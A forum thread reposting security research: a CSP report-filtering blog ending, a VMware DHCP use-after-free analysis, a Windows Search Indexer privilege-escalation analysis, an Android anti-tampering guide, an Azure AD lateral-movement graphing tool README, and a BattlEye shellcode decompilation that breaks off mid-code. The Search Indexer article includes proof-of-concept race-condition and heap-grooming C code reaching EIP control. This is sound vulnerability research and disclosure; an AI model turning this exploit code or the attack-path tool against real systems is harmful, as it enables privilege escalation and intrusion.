been kicked down the road. It would need to be rock solid. As of right now (for csper) there is no way for a customer to glean information about another customer, and obviously this is how things should be. But maybe in the future there could be an opt-in anonymized feature flag for this. But not for many months at least. If this is interesting to you (because it's a good idea, or a terrible idea, I'd love to hear your thoughts!) stuart@csper.io. Conclusion A dream I have is that one day most everyone could actually use Content-Security-Policy-Report-Only and get value with almost no work. If individuals are using the latest user agents, and if an endpoint's classification is good enough, websites could roll out CSP in report-only mode for a few weeks to establish a baseline of known inline reports and their positions, and then the endpoint will know where expected inline resources exist, and then only alert website owners on new reports it thinks that are an XSS. XSS detection for any website for almost no work. We're not there yet. But browsers and getting better at what they send, and classification of reports is getting easier. I hope this was useful! If you have any ideas or comments I would love to hear them! stuart at csper.io. Automatically Generating Content Security Policy A guide to automatically generating content security policy (CSP) headers. Csper builder collection csp reports using report-uri to generate/build a policy online in minutes. Content Security Policy (CSP) report-uri Technical reference on content security policy (CSP) report-uri. Includes example csp reports, example csp report-uri policy, and payload Other Security Features of Content Security Policy Other security features of content security policy including upgrade-insecure-requests, block-all-mixed-content, frame-ancestors, sandbox, form-actions, and more Sursa: https://csper.io/blog/csp-report-filtering
-
CVE-2020-3947: Use-After-Free Vulnerability in the VMware Workstation DHCP Component April 02, 2020 | KP Choubey SUBSCRIBE Ever since introducing the virtualization category at Pwn2Own in 2016, guest-to-host escapes have been a highlight of the contest. This year’s event was no exception. Other guest-to-host escapes have also come through the ZDI program throughout the year. In fact, VMware released a patch for just such a bug less than a week prior to this year’s competition. In this blog post, we look into CVE-2020-3947, which was submitted to the ZDI program (ZDI-20-298) in late December by an anonymous researcher. The vulnerability affects the DHCP server component of VMware Workstation and could allow attackers to escalate privileges from a guest OS and execute code on the host OS. Dynamic Host Configuration Protocol (DHCP) Dynamic Host Configuration Protocol (DHCP) is used to dynamically assign and manage IP addresses by exchanging DHCP messages between a DHCP client and server. DHCP messages include DHCPDISCOVER, DHCPOFFER, DHCPRELEASE, and several others. All DCHP messages begin with the following common header structure: Figure 1 - DHCP Header structure The Options field of a DHCP message contains a sequence of option fields. The structure of an option field is as follows: Figure 2 - Option Field Structure The optionCode field defines the type of option. The value of optionCode is 0x35 and 0x3d for the DHCP message type and client identifier options, respectively. A DHCP message must contain one DHCP message type option. For the DHCP message type option, the value of the optionLength field is 1 and the optionData field indicates the message type. A value of 1 indicates a DHCPDISCOVER message, while a value of 7 indicates a DHCPRELEASE message. These are the two message types that are important for this vulnerability. DHCPDISCOVER is broadcast by a client to get an IP address, and the client sends DHCPRELEASE to relinquish an IP address. The Vulnerability In VMWare Workstation, the vmnetdhcp.exe module provides DHCP server service to guest machines. This startup entry is installed as a Windows service. The vulnerable condition occurs when sending a DHCPDISCOVER message followed by a DHCPRELEASE message repeatedly to a vulnerable DHCP server. During processing of a DHCPRELEASE message, the DHCP server calls vmnetdhcp! supersede_lease (vmnetdhcp+0x3160). The supersede_lease function then copies data from one lease structure to another. A lease structure contains information such as an assigned client IP address, client hardware address, lease duration, lease status, and so on. The full lease structure is as follows: Figure 3 - Lease Structure For this vulnerability, the uid and uid_len fields are important. The uid field points to a buffer containing the string data from the optionData field of the client identifier option. The uid_len field indicates the size of this buffer. supersede_lease first checks whether the string data pointed by the respective uid fields of the source and destination lease are equal. If these two strings match, the function frees the buffer pointed to by the uid field of the source lease. Afterwards, supersede_lease calls write_lease (vmnetdhcp+016e0), passing the destination lease as an argument, to write the lease to an internal table. Figure 4 – Compare the uid Fields Figure 5 - Frees the uid Field In the vulnerable condition, meaning when a DHCPDISCOVER message followed by a DHCPRELEASE message is repeatedly received by the server, the respective uid fields of the source and destination lease structures actually point to the same memory location. The supersede_lease function does not check for this condition. As a result, when it frees the memory pointed to by the uid field of the source lease, the uid pointer of the destination lease becomes a hanging pointer. Finally, when write_lease accesses the uid field of the destination lease, a use-after-free (UAF) condition occurs. Figure 6 - Triggering the Bug The Patch VMware patched this bug and two lesser severity bugs with VMSA-2020-004. The patch to address CVE-2020-3947 contains changes in one function: supersede_lease. The patch comparison of supersede_lease in VMnetDHCP.exe version 15.5.1.50853 versus version 15.5.2.54704 is as follows: Figure 7 - BinDiff Patch Comparison In the patched version of supersede_lease, after performing the string comparison between the respective uid fields of the source and destination leases, it performs a new check to see if the respective uid fields are actually referencing the same buffer. If they are, the function skips the call to free. Since there are no workarounds listed, the only way to ensure you are protected from this bug is to apply the patch. Despite being a well understood problem, UAF bugs continue to be prevalent in modern software. In fact, 15% of the advisories we published in 2019 were the result of a UAF condition. It will be interesting to see if that trend continues in 2020. You can find me on Twitter @nktropy, and follow the team for the latest in exploit techniques and security patches. Sursa: https://www.zerodayinitiative.com/blog/2020/4/1/cve-2020-3947-use-after-free-vulnerability-in-the-vmware-workstation-dhcp-component
-
Analyzing a Windows Search Indexer LPE bug March 26, 2020 - SungHyun Park @ Diffense Introduction The Jan-Feb 2020 security patch fixes multiple bugs in the Windows Search Indexer. Many LPE vulnerabilities in the Windows Search Indexer have been found, as shown above1. Thus, we decided to analyze details from the applied patches and share them. Windows Search Indexer Windows Search Indexer is a Windows Service that handles indexing of your files for Windows Search, which fuels the file search engine built into windows that powers everything from the Start Menu search box to Windows Explorer, and even the Libraries feature. Search Indexer helps direct the users to the service interface through GUI, indexing options, from their perspectives, as indicated below. All the DB and temporary data during the indexing process are stored as files and managed. Usually in Windows Service, the whole process is carried out with NT AUTHORITY SYSTEM privileges. If the logic bugs happen to exist due to modifying file paths, it may trigger privilege escalation. (E.g. Symlink attack) We assumed that Search Indexer might be the vulnerability like so, given that most of the vulnerabilities recently occurred in Windows Service were LPE vulnerabilities due to logic bugs. However, the outcome of our analysis was not that; more details are covered afterward. Patch Diffing The analysis environment was Windows7 x86 in that it had a small size of the updated file and easy to identified the spot differences. We downloaded both patched versions of this module. They can be downloaded from Microsoft Update Catalog : patched version (January Patch Tuesday) : KB45343142 patched version (February Patch Tuesday) : KB45378133 We started with a BinDiff of the binaries modified by the patch (in this case there is only one: searchindexer.exe) Most of the patches were done in the CSearchCrawlScopeManager and CSearchRoot class. The former was patched in January, and then the latter was patched the following month. Both classes contained the same change, so we focused on CSearchRoot patched. The following figure shows that primitive codes were added, which used a Lock to securely access shared resources. We deduced that accessing the shared resources gave rise to the occurrence of the race condition vulnerability in that the patch consisted of putter, getter function. How to Interact with the Interface We referred to the MSDN to see how those classes were used and uncovered that they were all related to the Crawl Scope Manager. And we could check the method information of this class. And the MSDN said4 : The Crawl Scope Manager (CSM) is a set of APIs that lets you add, remove, and enumerate search roots and scope rules for the Windows Search indexer. When you want the indexer to begin crawling a new container, you can use the CSM to set the search root(s) and scope rules for paths within the search root(s). The CSM interface is as follows: IEnumSearchRoots IEnumSearchScopeRules ISearchCrawlScopeManager ISearchCrawlScopeManager2 ISearchRoot ISearchScopeRule ISearchItem For examples, adding, removing, and enumerating search roots and scope rules can be written by the following : The ISearchCrawlScopeManager tells the search engine about containers to crawl and/or watch, and items under those containers to include or exclude. To add a new search root, instantiate an ISearchRoot object, set the root attributes, and then call ISearchCrawlScopeManager::AddRoot and pass it a pointer to ISearchRoot object. // Add RootInfo & Scope Rule pISearchRoot->put_RootURL(L"file:///C:\ "); pSearchCrawlScopeManager->AddRoot(pISearchRoot); pSearchCrawlScopeManager->AddDefaultScopeRule(L"file:///C:\Windows", fInclude, FF_INDEXCOMPLEXURLS); // Set Registry key pSearchCrawlScopeManager->SaveAll(); We can also use ISearchCrawlScopeManager to remove a root from the crawl scope when we no longer want that URL indexed. Removing a root also deletes all scope rules for that URL. We can uninstall the application, remove all data, and then remove the search root from the crawl scope, and the Crawl Scope Manager will remove the root and all scope rules associated with the root. // Remove RootInfo & Scope Rule ISearchCrawlScopeManager->RemoveRoot(pszURL); // Set Registry key ISearchCrawlScopeManager->SaveAll(); The CSM enumerates search roots using IEnumSearchRoots. We can use this class to enumerate search roots for a number of purposes. For example, we might want to display the entire crawl scope in a user interface, or discover whether a particular root or the child of a root is already in the crawl scope. // Display RootInfo PWSTR pszUrl = NULL; pSearchRoot->get_RootURL(&pszUrl); wcout << L"\t" << pszUrl; // Display Scope Rule IEnumSearchScopeRules *pScopeRules; pSearchCrawlScopeManager->EnumerateScopeRules(&pScopeRules); ISearchScopeRule *pSearchScopeRule; pScopeRules->Next(1, &pSearchScopeRule, NULL)) pSearchScopeRule->get_PatternOrURL(&pszUrl); wcout << L"\t" << pszUrl; We thought that a vulnerability would arise in the process of manipulating URL. Accordingly, we started analyzing the root causes. Root Cause Analysis We conducted binary analysis focusing on the following functions : ISearchRoot::put_RootURL ISearchRoot::get_RootURL While analyzing ISearchRoot::put_RootURL and ISearchRoot::get_RootURL, we figured out that the object’s shared variable (CSearchRoot + 0x14) was referenced. The put_RootURL function wrote a user-controlled data in the memory of CSearchRoot+0x14. The get_RootURL function read the data located in the memory of CSearchRoot+0x14. , it appeared that the vulnerability was caused by this shared variable concerning patches. Thus, we finally got to the point where the vulnerability initiated. The vulnerability was in the process of double fetching length, and the vulnerability could be triggered when the following occurs: First fetch: Used as memory allocation size (line 9) Second fetch: Used as memory copy size (line 13) If the size of the first and that of the second differed, a heap overflow might occur, especially when the second fetch had a large size. We maintained that we change the size of pszURL sufficiently through the race condition before the memory copy occurs. Crash Through OleView5, we were able to see the interface provided by the Windows Search Manager. And we needed to hit vulnerable functions based on the methods of the interface. We could easily test it through the COM-based command line source code provided by MSDN6. And wrote the COM client code that hit vulnerable functions as following: int wmain(int argc, wchar_t *argv[]) { // Initialize COM library CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE); // Class instantiate ISearchRoot *pISearchRoot; CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_ALL, IID_PPV_ARGS(&pISearchRoot)); // Vulnerable functions hit pISearchRoot->put_RootURL(L"Shared RootURL"); PWSTR pszUrl = NULL; HRESULT hr = pSearchRoot->get_RootURL(&pszUrl); wcout << L"\t" << pszUrl; CoTaskMemFree(pszUrl); // Free COM resource, End pISearchRoot->Release(); CoUninitialize(); } Thereafter, bug triggering was quite simple. We created two threads: one writing different lengths of data to the shared buffer and the other reading data from the shared buffer at the same time. DWORD __stdcall thread_putter(LPVOID param) { ISearchManager *pSearchManager = (ISearchManager*)param; while (1) { pSearchManager->put_RootURL(L"AA"); pSearchManager->put_RootURL(L"AAAAAAAAAA"); } return 0; } DWORD __stdcall thread_getter(LPVOID param) { ISearchRoot *pISearchRoot = (ISearchRoot*)param; PWSTR get_pszUrl; while (1) { pISearchRoot->get_RootURL(&get_pszUrl); } return 0; } Okay, Crash! Undoubtedly, the race condition had succeeded before the StringCchCopyW function copied the RootURL data, leading to heap overflow. EIP Control We ought to create an object to the Sever heap where the vulnerability occurs for the sake of controlling EIP. We wrote the client codes as following, tracking the heap status. int wmain(int argc, wchar_t *argv[]) { CoInitializeEx(NULL, COINIT_MULTITHREADED | COINIT_DISABLE_OLE1DDE); ISearchRoot *pISearchRoot[20]; for (int i = 0; i < 20; i++) { CoCreateInstance(CLSID_CSearchRoot, NULL, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&pISearchRoot[i])); } pISearchRoot[3]->Release(); pISearchRoot[5]->Release(); pISearchRoot[7]->Release(); pISearchRoot[9]->Release(); pISearchRoot[11]->Release(); CreateThread(NULL, 0, thread_putter, (LPVOID)pISearchRoot[13], 0, NULL); CreateThread(NULL, 0, thread_getter, (LPVOID)pISearchRoot[13], 0, NULL); Sleep(500); CoUninitialize(); return 0; } We found out that if the client did not release the pISearchRoot object, IRpcStubBuffer objects would remain on the server heap. And we also saw that the IRpcStubBuffer object remained near the location of the heap where the vulnerability occurred. 0:010> !heap -p -all ... 03d58f10 0005 0005 [00] 03d58f18 0001a - (busy) <-- CoTaskMalloc return mssprxy!_idxpi_IID_Lookup <PERF> (mssprxy+0x75) 03d58f38 0005 0005 [00] 03d58f40 00020 - (free) 03d58f60 0005 0005 [00] 03d58f68 0001c - (busy) <-- IRpcStubBuffer Obj ? mssprxy!_ISearchRootStubVtbl+10 03d58f88 0005 0005 [00] 03d58f90 0001c - (busy) ? mssprxy!_ISearchRootStubVtbl+10 <-- IRpcStubBuffer Obj 03d58fb0 0005 0005 [00] 03d58fb8 00020 - (busy) 03d58fd8 0005 0005 [00] 03d58fe0 0001c - (busy) ? mssprxy!_ISearchRootStubVtbl+10 <-- IRpcStubBuffer Obj 03d59000 0005 0005 [00] 03d59008 0001c - (busy) ? mssprxy!_ISearchRootStubVtbl+10 <-- IRpcStubBuffer Obj 03d59028 0005 0005 [00] 03d59030 00020 - (busy) 03d59050 0005 0005 [00] 03d59058 00020 - (busy) 03d59078 0005 0005 [00] 03d59080 00020 - (free) 03d590a0 0005 0005 [00] 03d590a8 00020 - (free) 03d590c8 0005 0005 [00] 03d590d0 0001c - (busy) ? mssprxy!_ISearchRootStubVtbl+10 <-- IRpcStubBuffer Obj In COM, all interfaces have their own interface stub space. Stubs are small memory spaces used to support remote method calls during RPC communication, and IRpcStubBuffer is the primary interface for such interface stubs. In this process, the IRpcStubBuffer to support pISearchRoot’s interface stub remains on the server’s heap. The vtfunction of IRpcStubBuffer is as follows : 0:003> dds poi(03d58f18) l10 71215bc8 7121707e mssprxy!CStdStubBuffer_QueryInterface 71215bcc 71217073 mssprxy!CStdStubBuffer_AddRef 71215bd0 71216840 mssprxy!CStdStubBuffer_Release 71215bd4 71217926 mssprxy!CStdStubBuffer_Connect 71215bd8 71216866 mssprxy!CStdStubBuffer_Disconnect <-- client call : CoUninitialize(); 71215bdc 7121687c mssprxy!CStdStubBuffer_Invoke 71215be0 7121791b mssprxy!CStdStubBuffer_IsIIDSupported 71215be4 71217910 mssprxy!CStdStubBuffer_CountRefs 71215be8 71217905 mssprxy!CStdStubBuffer_DebugServerQueryInterface 71215bec 712178fa mssprxy!CStdStubBuffer_DebugServerRelease When the client’s COM is Uninitialized, IRpcStubBuffer::Disconnect disconnects all connections of object pointer. Therefore, if the client calls CoUninitialize function, CStdStubBuffer_Disconnect function is called on the server. It means that users can construct fake vtable and call that function. However, we haven’t always seen IRpcStubBuffer allocated on the same location heap. Therefore, several tries were needed to construct the heap layout. After several tries, the IRpcStubBuffer object was covered with the controllable value (0x45454545) as follows. In the end, we could show that indirect calls to any function in memory are possible! Conclusion Most of the LPE vulnerabilities recently occurred in Windows Service, were logic bugs. In this manner, analysis on Memory corruption vulnerabilities of Windows Search Indexer was quite interesting. Thereby, such Memory Corruption vulnerabilities are likely to occur in Windows Service hereafter. We should not overlook the possibilities. We hope that the analysis will serve as an insight to other vulnerability researchers and be applied to further studies. Reference https://portal.msrc.microsoft.com/en-us/security-guidance/acknowledgments ↩ https://www.catalog.update.microsoft.com/Search.aspx?q=KB4534314 ↩ https://www.catalog.update.microsoft.com/Search.aspx?q=KB4537813 ↩ https://docs.microsoft.com/en-us/windows/win32/search/-search-3x-wds-extidx-csm ↩ https://github.com/tyranid/oleviewdotnet ↩ https://docs.microsoft.com/en-us/windows/win32/search/-search-sample-crawlscopecommandline ↩ Sursa: http://blog.diffense.co.kr/2020/03/26/SearchIndexer.html
-
Protecting your Android App against Reverse Engineering and Tampering Avi Parshan Apr 2 · 4 min read I built a premium (paid) android app that has been cracked and modded. Therefore, I started researching ways to secure my code and make it more difficult to modify my app. Before I continue, You cannot mitigate these issues or completely prevent people from breaking your app. All you can do is make it slightly more difficult to get in and understand your code. I wrote this article because I felt that the only sources of information just said that it was nearly impossible to protect your app, just don’t leave secrets on the client device. That is partly true, but I wanted to compile sources that can actually assist independent developers like me. Lastly, when you search “android reverse engineer”, all the results are for cracking other peoples apps. There are almost no sources on how to protect your own apps. So here are some useful blogs and libraries which has helped me make my code more tamper-resistant. Several sources that are less popular have been mentioned in the list below to help you! This article is geared towards new android developers or ones who haven’t really dealt with reverse engineering and mods before. Proguard: This is built into android studio and serves several purposes. The first one is code obfuscation, basically turning your code into gibberish to make it difficult to understand. This can easily be beaten, but it is super simple to add to your app so I still recommend implementing it. The second function is code shrinking, which is still relevant to this article. Basically, it removes unused resources and code. I wouldn’t rely on this, but it is included by default and worth implementing. The only way of actually checking if it changed anything is by reverse engineering your own APK. Dexguard: A tool that isn’t free, but made by the same team of Proguard. I haven’t used it myself, so can’t recommend it. It includes everything that Proguard has and adds more features. Some notable additions are String and Resource Encryption. Android NDK: Writing parts of your app in native code (C or C++) will certainly deter people from reverse engineering your app. There are several downsides to using the NDK, such as performance issues when making JNI calls and you can introduce potential bugs down the line that will be harder to track. You’ll also have to do the garbage collection yourself, which isn’t trivial for beginners. PiracyChecker: A popular library on github with some basic ways to mitigate reverse engineering. I included this in one of my apps, but it already has been cracked. There are multiple checks you can run, including an implementation of the Google Play Licensing Check (LVL). This is open source, so you can look at his code and contribute too! I am using Google Play app signing, so couldn’t actually use the APK signature to verify that I signed the app, or even google did ;( javiersantos/PiracyChecker Android Library An Android library that prevents your app from being pirated / cracked using Google Play Licensing… github.com Google’s SafetyNet Attestation API: This is an amazing option, though I haven’t tested it thoroughly. Basically, you call Google’s Attestation API and they can tell you if the device the app is running on is secure or not. Basically if it is rooted, or using LuckyPatcher for instance. Deguard: This was a website that I stumbled upon. You upload an APK file, then it uses some algorithms to reverse what proguard does. Now, you can open classes, sometimes with full class names too! I used this to pull some modded versions of my app and see what has been changed more or less. There are manual processes to achieve similar results, but this is faster and requires less work. http://apk-deguard.com/ Android Anti-Reversing Defenses: This blog post explains some great defenses to put up against hackers/reverse engineering. I suggest reading it and implementing at least one or two of the methods used. There are code snippets too! Android Anti-Reversing Defenses Detection code also often looks for binaries that are usually installed once a device has been rooted. These searches… mobile-security.gitbook.io Android Security: Adding Tampering Detection to Your App: Another great article, also with code snippets about how to protect your app. this piece also includes great explanations about how each method woks. https://www.airpair.com/android/posts/adding-tampering-detection-to-your-android-app MobSF: I heard about this from an Android Reverse Engineering Talk I wa swatching on YouTube. They mentioned this amazing tool in passing. I have never heard of it before but decided to go ahead and test it out. It works on Windows, Linux, and Mac. In short, you run this locally -> upload an APK (no AABs yet), and it analyses it for vulnerbilities. It performs basical checks and shows you a lot of information about an APK, like who signed the cert , app permissions, all the strings, and much more! I had some issues installing it, but the docs are good and they have a slack channel which came in handy. https://github.com/MobSF/Mobile-Security-Framework-MobSF Overall, there are several ways to make your app more difficult to crack. I’d recommend that your app should call an API rather than do the checks locally. It is much easier to modify code on the client rather than on the server. Let me know if I missed anything, and if you have more ideas! If you found this article useful, consider buying me a coffee! Sursa: https://medium.com/avi-parshan-studios/protecting-your-android-app-against-reverse-engineering-and-tampering-a727768b2e9e
-
What is AzureADLateralMovement AzureADLateralMovement allows to build Lateral Movement graph for Azure Active Directory entities - Users, Computers, Groups and Roles. Using the Microsoft Graph API AzureADLateralMovement extracts interesting information and builds json files containing lateral movement graph data competable with Bloodhound 2.2.0 Some of the implemented features are : Extraction of Users, Computers, Groups, Roles and more. Transform the entities to Graph objects Inject the object to Azure CosmosDB Graph Explanation: Terry Jeffords is a member of Device Administrators. This group is admin on all the AAD joined machines including Desktop-RGR29LI Where the user Amy Santiago has logged-in in the last 2 hours and probably still has a session. This attack path can be exploited manually or by automated tools. Architecture The toolkit consists of several components MicrosoftGraphApi Helper The MicrosoftGraphApi Helper is responsible for retriving the required data from Graph API BloodHound Helper Responsible for creating json files that can dropped on BloodHound 2.2.0 to extend the organization covered entities CosmosDbGraph Helper In case you prefer using the Azure CosmosDb service instead of the BloodHound client, this module will push the data retrived into a graph database service How to set up Steps Download, compile and run Browse to http://localhost:44302 Logon with AAD administrative account Click on "AzureActiveDirectoryLateralMovement" to retrive data Drag the json file into BloodHound 2.2.0 Configuration An example configuration as below : { "AzureAd": { "CallbackPath": "/signin-oidc", "BaseUrl": "https://localhost:44334", "Scopes": "Directory.Read.All AuditLog.Read.All", "ClientId": "<ClientId>", "ClientSecret": "<ClientSecret>", "GraphResourceId": "https://graph.microsoft.com/", "GraphScopes": "Directory.Read.All AuditLog.Read.All" }, "Logging": { "IncludeScopes": false, "LogLevel": { "Default": "Warning" } }, "CosmosDb": { "EndpointUrl": "https://<CosmosDbGraphName>.documents.azure.com:443/", "AuthorizationKey": "<AuthorizationKey>" } } Deployment Before start using this tool you need to create an Application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application. After creating the application, copy the Application ID and change it on AzureOauth.config. The URL(external listener) that will be used for the application should be added as a Redirect URL. To add a redirect url, go the application and click Add a Redirect URL. The Redirect URL should be the URL that will be used to host the application endpoint, in this case https://localhost:44302/ Make sure to check both the boxes as shown below : Security Considerations The lateral movement graph allows investigate available attack paths truly available in the AAD environment. The graph is combined by Nodes of Users, Groups and Devices, where the edges are connecting them by the logic of �AdminTo�, �MemberOf� and �HasSession� This logic is explained in details by the original research document: https://github.com/BloodHoundAD/Bloodhound/wiki In the on-premise environment BloodHound collects data using SMAR and SMB protocols to each machine in the domain, and LDAP to the on-premise AD. In Azure AD environment, the relevant data regarding Azure AD device, users and logon sessions can be retrieved using Microsoft Graph API. Once the relevant data is gathered it is possible to build similar graph of connections for users, groups and Windows machines registered in the Azure Active Directory. To retrive the data and build the graph data this project uses: Azure app Microsoft Graph API Hybrid AD+AAD domain environment synced using pass-through authentication BloodHound UI and entities objects The AAD graph is based on the following data Devices - AAD joined Windows devices only and their owner's Users - All AD or AAD users Administrative roles and Groups - All memberships of roles and groups Local Admin - The following are default local admins in AAD joined device - Global administrator role - Device administrator role - The owner of the machine Sessions - All logins for Windows machines References Exploring graph queries on top of Azure Cosmos DB with Gremlin https://github.com/talmaor/GraphExplorer SharpHound - The C# Ingestor https://github.com/BloodHoundAD/BloodHound/wiki/Data-Collector Quickstart: Build a .NET Framework or Core application using the Azure Cosmos DB Gremlin API account https://docs.microsoft.com/en-us/azure/cosmos-db/create-graph-dotnet How to: Use the portal to create an Azure AD application and service principal that can access resources https://docs.microsoft.com/en-us/azure/active-directory/develop/howto-create-service-principal-portal Sursa: https://github.com/talmaor/AzureADLateralMovement
-
BattlEye reverse engineer tracking
Nytro posted a topic in Reverse engineering & exploit development
Mar 31, 2020 :: vmcall :: [ battleye, anti-cheats, game-hacking ] BattlEye reverse engineer tracking Preface Modern commercial anti-cheats are faced by an increasing competetiveness in professional game-hack production, and thus have begun implementing questionable methods to prevent this. In this article, we will present a previously unknown anti-cheat module, pushed to a small fraction of the player base by the commercial anti-cheat BattlEye. The prevalent theory is that this module is specifically targeted against reverse engineers, to monitor the production of video game hacking tools, due to the fact that this is dynamically pushed. Shellcode ?? [1] Shellcode refers to independent code that is dynamically loaded into a running process. The code snippets in this article are beautified decompilations of shellcode [1] that we’ve dumped and deobfuscated from BattlEye. The shellcode was pushed to my development machine while messing around in Escape from Tarkov. On this machine various reverse engineering applications such as x64dbg are installed and frequently running, which might’ve caught the attention of the anti-cheat in question. To confirm the suspicion, a secondary machine that is mainly used for testing was booted, and on it, Escape from Tarkov was installed. The shellcode in question was not pushed to the secondary machine, which runs on the same network and utilized the same game account as the development machine. Other members of Secret Club have experienced the same ordeal, and the common denominator here is that we’re all highly specialized reverse engineers, which means most have the same applications installed. To put a nail in the coffin I asked a few of my fellow highschool classmates to let me log shellcode activity (using a hypervisor) on their machines while playing Escape from Tarkov, and not a single one of them received the module in question. Needless to say, some kind of technical minority is being targeted, which the following code segments will show. Context In this article, you will see references to a function called battleye::send. This function is used by the commercial anti-cheat to send information from the client module BEClient_x64/x86.dll inside of the game process, to the respective game server. This is to be interpreted as a pure “send data over the internet” function, and only takes a buffer as input. The ID in each report header determines the type of “packet”, which can be used to distinguish packets from one another. Device driver enumeration This routine has two main purposes: enumerating device drivers and installed certificates used by the respective device drivers. The former has a somewhat surprising twist though, this shellcode will upload any device driver(!!) matching the arbitrary “evil” filter to the game server. This means that if your proprietary, top-secret and completely unrelated device driver has the word “Callback” in it, the shellcode will upload the entire contents of the file on disk. This is a privacy concern as it is a relatively commonly used word for device drivers that install kernel callbacks for monitoring events. The certificate enumerator sends the contents of all certificates used by device drivers on your machine directly to the game server: // ONLY ENUMERATE ON X64 MACHINES GetNativeSystemInfo(&native_system_info); if ( native_system_info.u.s.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64 ) { if ( EnumDeviceDrivers(device_list, 0x2000, &required_size) ) { if ( required_size <= 0x2000u ) { report_buffer = (__int8 *)malloc(0x7530); report_buffer[0] = 0; report_buffer[1] = 0xD; buffer_index = 2; // DISABLE FILESYSTEM REDIRECTION IF RUN IN WOW64 if ( Wow64EnableWow64FsRedirection ) Wow64EnableWow64FsRedirection(0); // ITERATE DEVICE DRIVERS for ( device_index = 0; ; ++device_index ) { if ( device_index >= required_size / 8u /* MAX COUNT*/ ) break; // QUERY DEVICE DRIVER FILE NAME driver_file_name_length = GetDeviceDriverFileNameA( device_list[device_index], &report_buffer[buffer_index + 1], 0x100); report_buffer[buffer_index] = driver_file_name_length; // IF QUERY DIDN'T FAIL if ( driver_file_name_length ) { // CACHE NAME BUFFER INDEX FOR LATER USAGE name_buffer_index = buffer_index; // OPEN DEVICE DRIVER FILE HANDLE device_driver_file_handle = CreateFileA( &report_buffer[buffer_index + 1], GENERIC_READ, FILE_SHARE_READ, 0, 3, 0, 0); if ( device_driver_file_handle != INVALID_HANDLE_VALUE ) { // CONVERT DRIVER NAME MultiByteToWideChar( 0, 0, &report_buffer[buffer_index + 1], 0xFFFFFFFF, &widechar_buffer, 0x100); } after_device_driver_file_name_index = buffer_index + report_buffer[buffer_index] + 1; // QUERY DEVICE DRIVER FILE SIZE *(_DWORD *)&report_buffer[after_device_driver_file_name_index] = GetFileSize(device_driver_file_handle, 0); after_device_driver_file_name_index += 4; report_buffer[after_device_driver_file_name_index] = 0; buffer_index = after_device_driver_file_name_index + 1; CloseHandle(device_driver_file_handle); // IF FILE EXISTS ON DISK if ( device_driver_file_handle != INVALID_HANDLE_VALUE ) { // QUERY DEVICE DRIVER CERTIFICATE if ( CryptQueryObject( 1, &widechar_buffer, CERT_QUERY_CONTENT_FLAG_PKCS7_SIGNED_EMBED, CERT_QUERY_FORMAT_FLAG_BINARY, 0, &msg_and_encoding_type, &content_type, &format_type, &cert_store, &msg_handle, 1) ) { // QUERY SIGNER INFORMATION SIZE if ( CryptMsgGetParam(msg_handle, CMSG_SIGNER_INFO_PARAM, 0, 0, &signer_info_size) ) { signer_info = (CMSG_SIGNER_INFO *)malloc(signer_info_size); if ( signer_info ) { // QUERY SIGNER INFORMATION if ( CryptMsgGetParam(msg_handle, CMSG_SIGNER_INFO_PARAM, 0, signer_info, &signer_info_size) ) { qmemcpy(&issuer, &signer_info->Issuer, sizeof(issuer)); qmemcpy(&serial_number, &signer_info->SerialNumber, sizeof(serial_number)); cert_ctx = CertFindCertificateInStore( cert_store, X509_ASN_ENCODING|PKCS_7_ASN_ENCODING, 0, CERT_FIND_SUBJECT_CERT, &certificate_information, 0); if ( cert_ctx ) { // QUERY CERTIFICATE NAME cert_name_length = CertGetNameStringA( cert_ctx, CERT_NAME_SIMPLE_DISPLAY_TYPE, 0, 0, &report_buffer[buffer_index], 0x100); report_buffer[buffer_index - 1] = cert_name_length; if ( cert_name_length ) { report_buffer[buffer_index - 1] -= 1; buffer_index += character_length; } // FREE CERTIFICATE CONTEXT CertFreeCertificateContext(cert_ctx); } } free(signer_info); } } // FREE CERTIFICATE STORE HANDLE CertCloseStore(cert_store, 0); CryptMsgClose(msg_handle); } // DUMP ANY DRIVER NAMED "Callback????????????" where ? is wildmark if ( *(_DWORD *)&report_buffer[name_buffer_index - 0x11 + report_buffer[name_buffer_index]] == 'llaC' && *(_DWORD *)&report_buffer[name_buffer_index - 0xD + report_buffer[name_buffer_index]] == 'kcab' && (unsigned __int64)suspicious_driver_count < 2 ) { // OPEN HANDLE ON DISK file_handle = CreateFileA( &report_buffer[name_buffer_index + 1], 0x80000000, 1, 0, 3, 128, 0); if ( file_handle != INVALID_HANDLE_VALUE ) { // INITIATE RAW DATA DUMP raw_packet_header.pad = 0; raw_packet_header.id = 0xBEu; battleye::send(&raw_packet_header, 2, 0); // READ DEVICE DRIVER CONTENTS IN CHUNKS OF 0x27EA (WHY?) while ( ReadFile(file_handle, &raw_packet_header.buffer, 0x27EA, &size, 0x00) && size ) { raw_packet_header.pad = 0; raw_packet_header.id = 0xBEu; battleye::send(&raw_packet_header, (unsigned int)(size + 2), 0); } CloseHandle(file_handle); } } } } } // ENABLE FILESYSTEM REDIRECTION if ( Wow64EnableWow64FsRedirection ) { Wow64EnableWow64FsRedirection(1, required_size % 8u); } // SEND DUMP battleye::send(report_buffer, buffer_index, 0); free(report_buffer); } } } Window enumeration This routine enumerates all visible windows on your computer. Each visible window will have its title dumped and uploaded to the server together with the window class and style. If this shellcode is pushed while you have a Google Chrome tab open in the background with confidential information regarding your divorce, BattlEye now knows about this, too bad. While this is probably a really great method to monitor the activites of cheaters, it’s a very aggressive way and probably yields a ton of inappropriate information, which will be sent to the game server over the internet. No window is safe from being dumped, so be careful when you load up your favorite shooter game. The decompilation is as follows: top_window_handle = GetTopWindow(0x00); if ( top_window_handle ) { report_buffer = (std::uint8_t*)malloc(0x5000); report_buffer[0] = 0; report_buffer[1] = 0xC; buffer_index = 2; do { // FILTER VISIBLE WINDOWS if ( GetWindowLongA(top_window_handle, GWL_STYLE) & WS_VISIBLE ) { // QUERY WINDOW TEXT window_text_length = GetWindowTextA(top_window_handle, &report_buffer[buffer_index + 1], 0x40); for ( I = 0; I < window_text_length; ++i ) report_buffer[buffer_index + 1 + i] = 0x78; report_buffer[buffer_index] = window_text_length; // QUERY WINDOW CLASS NAME after_name_index = buffer_index + (char)window_text_length + 1; class_name_length = GetClassNameA(top_window_handle, &report_buffer[after_name_index + 1], 0x40); report_buffer[after_name_index] = class_name_length; after_class_index = after_name_index + (char)class_name_length + 1; // 